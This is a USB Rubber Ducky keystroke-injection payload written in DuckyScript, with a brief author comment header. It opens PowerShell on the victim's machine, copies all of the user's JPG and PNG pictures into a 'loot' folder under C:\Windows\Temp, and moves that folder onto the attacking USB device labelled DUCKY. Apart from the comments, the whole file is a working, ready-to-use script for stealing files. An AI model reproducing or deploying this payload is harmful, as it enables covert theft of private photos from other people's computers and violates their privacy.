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REM Written and tested by Dante Sparda
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REM this took a lot of digging and research. please use responsibly.
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REM i wrote this on a wim but of course you can filter whatever you want to the loot folder
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REM I used some premise i found below and modified what i needed
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REM https://www.mathewjbray.com/powershell/powershell-get-drive-letters-by-volume-name-and-execute-robocopy/
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DELAY 1000
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GUI R
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DELAY 1000
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STRING powershell.exe
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ENTER
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DELAY 3000
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STRING cd C:\Users\$env:Username\Pictures\
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ENTER
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STRING get-childitem -Filter *.JPG", *.PNG" -path "C:\Users\$env:Username\Pictures\"
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ENTER
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STRING Copy-Item -path "C:\Users\$env:Username\Pictures\" -include "*.JPG", "*.PNG" -Destination "C:\Windows\Temp" -Force -PassThru
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ENTER
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STRING cd C:\Windows\Temp
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ENTER
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STRING mkdir loot
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ENTER
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STRING $destinationLabel = "DUCKY"
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ENTER
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STRING $destinationLetter = Get-WmiObject -Class Win32_Volume | where {$_.Label -eq $destinationLabel} | select -expand name
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ENTER
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STRING get-childitem -Filter .jpg*, .png* -path C:\Windows\Temp | move-item -Destination "C:\Windows\Temp\loot"
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ENTER
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STRING move-item -path C:\Windows\Temp\loot -Destination $destinationLetter
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ENTER
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END
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